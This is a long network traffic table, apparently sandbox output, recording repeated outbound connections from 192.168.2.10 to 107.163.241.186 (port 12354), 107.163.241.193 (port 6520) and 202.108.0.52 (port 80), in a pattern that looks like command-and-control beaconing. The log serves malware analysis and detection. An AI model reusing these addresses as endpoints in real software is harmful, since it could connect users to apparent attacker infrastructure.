Nov 19, 2024 14:24:35.497900009 CET  49772        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:35.888485909 CET  49773        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:37.388582945 CET  49770        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:37.497929096 CET  49772        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:37.513539076 CET  49771        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:37.888644934 CET  49773        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:38.389497995 CET  49774        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:38.665736914 CET  49775        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:38.665951014 CET  49776        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:39.404112101 CET  49774        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:39.669806004 CET  49775        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:39.673082113 CET  49776        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:41.419861078 CET  49774        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:41.685420990 CET  49775        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:41.689074039 CET  49776        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:41.888539076 CET  49773        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:42.405764103 CET  49777        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:42.517746925 CET  49778        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:42.519460917 CET  49779        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:43.419748068 CET  49777        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:43.529154062 CET  49779        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:43.529162884 CET  49778        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:45.419815063 CET  49777        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:45.544925928 CET  49779        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:45.544935942 CET  49778        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:46.422786951 CET  49780        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:46.873986006 CET  49781        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:46.874166012 CET  49782        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:47.419845104 CET  49780        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:47.888660908 CET  49782        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:47.888664961 CET  49781        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:49.435436010 CET  49780        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:49.888577938 CET  49781        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:49.888683081 CET  49782        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:49.888686895 CET  49773        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:50.437005043 CET  49783        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:50.580527067 CET  49784        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:50.581937075 CET  49785        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:51.451159000 CET  49783        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:51.576056004 CET  49784        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:51.591686964 CET  49785        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:53.466671944 CET  49783        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:53.591718912 CET  49784        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:53.591722012 CET  49785        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:54.499115944 CET  49787        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:54.973107100 CET  49788        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:55.358501911 CET  49789        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:55.513581038 CET  49787        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:55.966790915 CET  49788        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:56.001343966 CET  49790        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:56.373224974 CET  49789        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:57.013595104 CET  49790        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:57.513740063 CET  49787        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:57.966811895 CET  49788        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:58.374989986 CET  49789        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:58.514921904 CET  49791        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:58.688690901 CET  49792        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:58.689388037 CET  49793        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:59.013598919 CET  49790        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:59.529202938 CET  49791        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:59.685534954 CET  49793        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:59.701097012 CET  49792        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:01.544879913 CET  49791        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:01.685458899 CET  49793        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:01.716754913 CET  49792        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:02.518407106 CET  49794        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:02.764303923 CET  49795        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:02.764791965 CET  49796        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:03.013828993 CET  49790        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:25:03.513659954 CET  49794        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:03.779249907 CET  49796        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:03.779309988 CET  49795        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:05.623038054 CET  49794        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:05.779218912 CET  49796        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:05.826102972 CET  49795        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:06.529954910 CET  49797        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:06.646595001 CET  49798        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:06.647576094 CET  49799        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:07.623004913 CET  49797        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:07.810517073 CET  49799        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:07.826126099 CET  49798        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:09.622970104 CET  49797        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:09.810532093 CET  49799        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:09.919898033 CET  49798        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:10.545696974 CET  49800        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:10.819297075 CET  49801        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:10.819554090 CET  49802        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:11.013605118 CET  49790        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:25:11.701167107 CET  49800        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:11.826121092 CET  49801        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:12.013644934 CET  49802        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:13.701122999 CET  49800        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:13.826121092 CET  49801        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:14.013669968 CET  49802        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:14.681323051 CET  49803        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:14.681533098 CET  49804        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:14.681857109 CET  49805        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:15.701123953 CET  49804        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:15.701220036 CET  49805        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:15.827027082 CET  49803        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:17.128073931 CET  49806        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:25:17.734255075 CET  49804        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:17.734306097 CET  49805        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:17.826143980 CET  49803        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:18.326220989 CET  49806        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:25:18.709216118 CET  49807        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:18.815663099 CET  49808        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:18.816824913 CET  49809        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:19.810564041 CET  49807        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:19.810909033 CET  49809        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:19.826169968 CET  49808        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:20.326165915 CET  49806        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:25:21.810544968 CET  49807        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:21.810584068 CET  49809        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:21.826164961 CET  49808        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:22.719654083 CET  49811        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:22.943854094 CET  49812        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:25:22.945964098 CET  49813        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:25:23.826306105 CET  49811        12354      192.168.2.10  107.163.241.186
                                    Nov 19, 2024 14:25:24.013674021 CET4981212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:24.013675928 CET4981380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:24.326179981 CET498066520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:25.826472044 CET4981112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:26.013659000 CET4981212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:26.013695955 CET4981380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:26.733376980 CET4981412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:26.849895000 CET4981512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:26.851104021 CET4981680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:27.827009916 CET4981412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:28.014064074 CET4981512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:28.019062042 CET4981680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:29.827105999 CET4981412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:30.123100996 CET4981512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:30.127074003 CET4981680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:30.749066114 CET4981812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:30.936288118 CET4981912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:30.951965094 CET4982080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:31.901240110 CET4981812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:32.013701916 CET4982080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:32.013801098 CET4981912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:32.327092886 CET498066520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:33.947594881 CET4981812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:34.013669968 CET4982080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:34.056339979 CET4981912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:34.764420033 CET4982112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:34.889923096 CET4982212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:34.891557932 CET4982380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:35.810610056 CET4982112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:35.977252960 CET4982212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:36.013722897 CET4982380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:37.810601950 CET4982112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:37.998517036 CET4982212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:38.015193939 CET4982380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:38.437176943 CET498246520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:38.920519114 CET4982512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:38.972784996 CET4982680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:38.973191023 CET4982712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:39.513700008 CET498246520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:40.013745070 CET4982512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:40.013746023 CET4982680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:40.014017105 CET4982712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:41.529357910 CET498246520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:42.013711929 CET4982512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:42.013711929 CET4982712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:42.013729095 CET4982680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:42.936799049 CET4982812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:43.052885056 CET4982912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:43.054179907 CET4983080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:44.011044025 CET4982812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:44.138705015 CET4983080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:44.201215982 CET4982912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:45.623193026 CET498246520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:46.107491016 CET4982812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:46.310622931 CET4982912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:46.326256990 CET4983080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:46.952352047 CET4983112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:47.171063900 CET4983280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:47.171258926 CET4983312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:47.998117924 CET4983112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:48.253576994 CET4983280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:48.326225042 CET4983312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:50.107494116 CET4983112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:50.310659885 CET4983280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:50.326404095 CET4983312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:50.967982054 CET4983412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:51.081588984 CET4983512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:51.082614899 CET4983680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:52.013736010 CET4983412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:52.123116970 CET4983512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:52.201275110 CET4983680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:53.623137951 CET498246520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:54.013752937 CET4983412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:54.123142004 CET4983512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:54.310648918 CET4983680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:54.984277964 CET4983812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:55.235299110 CET4983912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:55.781266928 CET4984080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:56.013926983 CET4983812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:56.326260090 CET4983912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:56.826364040 CET4984080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:58.013998032 CET4983812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:58.326275110 CET4983912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:58.826313972 CET4984080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:58.999727011 CET4984112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:59.183645964 CET4984212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:59.185987949 CET4984380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:59.734745026 CET498446520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:00.107600927 CET4984112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:00.271472931 CET4984212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:00.326303005 CET4984380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:00.826343060 CET498446520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:02.193212986 CET4984112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:02.310671091 CET4984212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:02.326704025 CET4984380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:02.826308012 CET498446520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:03.020301104 CET4984512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:03.130287886 CET4984612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:03.130894899 CET4984780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:04.013784885 CET4984512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:04.201312065 CET4984612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:04.326307058 CET4984780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:06.013952971 CET4984512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:06.201286077 CET4984612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:06.327136993 CET4984780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:06.826878071 CET498446520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:07.306355000 CET4984812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:07.306818962 CET4984912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:07.330537081 CET4985080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:08.326307058 CET4984912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:08.326370001 CET4984812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:08.509690046 CET4985080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:10.326304913 CET4984912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:10.326370001 CET4984812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:10.607609034 CET4985080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:11.311594009 CET4985112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:11.424372911 CET4985212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:11.425437927 CET4985380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:12.326384068 CET4985112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:12.449712992 CET4985380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:12.513812065 CET4985212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:14.326308966 CET4985112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:14.515177011 CET4985212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:14.607755899 CET4985380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:14.826314926 CET498446520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:15.330224037 CET4985512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:15.530678988 CET4985612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:15.530740023 CET4985780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:16.513856888 CET4985512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:16.590523005 CET4985780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:16.623325109 CET4985612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:18.514064074 CET4985512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:18.623262882 CET4985612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:18.645919085 CET4985780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:19.330279112 CET4985812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:19.441782951 CET4985912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:19.442440987 CET4986080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:20.513856888 CET4985912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:20.515156984 CET4985812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:20.607600927 CET4986080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:20.946676970 CET498616520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:21.998310089 CET498616520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:22.524121046 CET4985912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:22.524156094 CET4985812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:22.607608080 CET4986080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:23.342793941 CET4986212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:23.540503979 CET4986312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:23.580389977 CET4986480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:24.013904095 CET498616520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:24.513859987 CET4986212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:24.623307943 CET4986312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:24.623310089 CET4986480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:26.513900042 CET4986212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:26.623243093 CET4986312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:26.627239943 CET4986480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:27.361130953 CET4986512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:27.476914883 CET4986612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:27.478612900 CET4986780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:28.013916969 CET498616520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:28.513874054 CET4986512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:28.513875008 CET4986780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:28.514127970 CET4986612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:30.513968945 CET4986512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:30.513969898 CET4986780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:30.514030933 CET4986612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:31.574285030 CET4986912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:31.575514078 CET4987080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:31.575692892 CET4986812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:32.623689890 CET4987080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:32.679872990 CET4986912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:32.679876089 CET4986812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:34.623238087 CET4987080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:34.701411963 CET4986912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:34.701464891 CET4986812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:35.577670097 CET4987212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:35.692183018 CET4987312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:35.693097115 CET4987480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:36.013899088 CET498616520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:36.628499031 CET4987212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:36.810834885 CET4987480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:36.827510118 CET4987312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:38.810777903 CET4987480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:38.826387882 CET4987212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:39.013997078 CET4987312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:39.593848944 CET4987512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:39.759171009 CET4987680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:39.788111925 CET4987712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:40.623330116 CET4987512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:40.826781988 CET4987712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:40.904541016 CET4987680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:42.242604017 CET498786520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:42.623280048 CET4987512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:42.826445103 CET4987712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:42.984397888 CET4987680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:43.310796976 CET498786520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:44.157605886 CET4987912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:44.186698914 CET4988012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:44.187304020 CET4988180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:45.310898066 CET4988012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:45.313254118 CET498786520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:45.326477051 CET4987912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:45.326643944 CET4988180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:47.326431990 CET4987912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:47.326455116 CET4988180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:47.391455889 CET4988012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:48.171858072 CET4988212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:48.283902884 CET4988312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:48.284909010 CET4988480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:49.201543093 CET4988212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:49.310791016 CET4988312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:49.310808897 CET498786520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:49.326417923 CET4988480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:51.288141012 CET4988212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:51.326416969 CET4988480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:51.397835016 CET4988312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:52.210390091 CET4988512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:52.317163944 CET4988612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:52.317763090 CET4988780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:53.310836077 CET4988512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:53.326438904 CET4988780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:53.498387098 CET4988612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:55.310836077 CET4988512354192.168.2.10107.163.241.186
